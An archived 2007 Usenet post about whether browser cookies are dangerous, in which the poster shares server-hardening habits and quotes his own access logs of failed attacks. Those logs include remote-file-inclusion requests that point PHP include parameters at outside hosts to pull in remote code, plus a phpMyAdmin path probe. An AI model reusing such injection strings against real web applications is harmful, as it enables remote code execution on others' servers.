Re: I want a transistor

On a sunny day (Mon, 26 Nov 2007 07:03:32 GMT) it happened JosephKK
<joseph_barrett@xxxxxxxxxxxxx> wrote in
<8du2j.27004$lD6.25076@xxxxxxxxxxxxxxxxxxxxxxxxxx>:

Got to tired of can't do anything without cookies.

You mean you have them cookies disabled?
hardly any site is cooky free thse days no?
Cookies are not dangerous, they are just little flufs on your
harddisk, not executable as far as I know.

There have been cookies that included executables and used to spread
viruses, spyware, and other malicious products.

I am not denying this is perhaps possible, but I know here every
link I clicked is stored for years, every email passes via NSA
evaluators, every phone call too, what not.
So 'spy'.. we are pretty much transparent now to the Rulers Of The World.
I have an email subscription to http://www.buerger-cert.de , and on
regular basis receive email warnings about the next virus, bug, attack,
what not. If you can read German, try to subscribe to them.
Some tips are important, but not even my firefox is up to date, because if I needed
it to be up to date, then I would need to re-install a new version each week.
The same for adobe, realplayer, many other applications.
There is no 'safe' computer.
Cookies never gave me any problems, they are convenient if
I read news sites (like nytimes.com) and I am welcomed with
my own name etc.
Also the fact that I run Linux probably protects me, with the system online
now for several years 24/7, the only real dangerous attacks I have seen are the ones
trying to do http request to other servers via mine, ones trying obvious directories
to grab my databases, some recently to use holes in my wiki / blog.
Things like this:
213.60.19.182 cm19182.red.mundo-r.com - - [21/Nov/2007:04:26:54 +0100] "GET /kalendar/tools/send_reminders.php?includedir=http://85.114.128.21/t.txt? HTTP/1.1" 404 887
Or this
195.188.8.14 195.188.8.14 - - [16/Nov/2007:18:12:58 +0100] "GET /pmwiki.php?GLOBALS[FarmD]=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 887

One recommendation from this, apart from firewalls etc:
DO NOT KEEP YOUR APPLICATIONS IN THEIR DEFAUT DIRECTORIES.

See them try:
66.43.88.82 mail.vividcollection.com - - [19/Nov/2007:18:38:53 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 887
It failed, because I do not keep things in phpMyAdmin-2.5.1 (he tried all other possible versions too, also for other programs).

Yes I expose those IPs, killfile them.
In my case they are semi-auto added to the firewall, never ever being able to even find my serverIP from the servername again,
as I also run the nameserver :-)

Cookies? Nothing to worry about.



.

Relevant Pages

  • Re: Sessions vs Cookies
    ... servers and want to be sure I choose the correct path for controlling ... different browser of a previously created session. ... You can store anything in cookies by using php mcrypt extension's ... That means you are either on the machine using the session, or somewhere between the client and server, and monitoring the traffic. ...
    (comp.lang.php)
  • Re: Cookies not being sent by IIS
    ... cookies between servers. ... This was a coding problem with our websites. ... > I have read other related posts about IIS not sending cookies with no ...
    (microsoft.public.inetserver.iis.activeserverpages)
  • Re: Cookies not being sent by IIS
    ... cookies between servers. ... This was a coding problem with our websites. ... > I have read other related posts about IIS not sending cookies with no ...
    (microsoft.public.inetserver.iis)
  • Re: Sessions vs Cookies
    ... servers and want to be sure I choose the correct path for controlling ... persistant information, ... You can securely use cookies, php session use cookies, so anybody can ...
    (comp.lang.php)
  • Re: Software Firewalls Question
    ... "firewalls" do not have this feature. ... you have some spyware or a trojan on there already. ... spyware (and, no doubt, trojans) can infect via this route. ... only cookies that get sent back to the originating server (or Reject ...
    (comp.security.firewalls)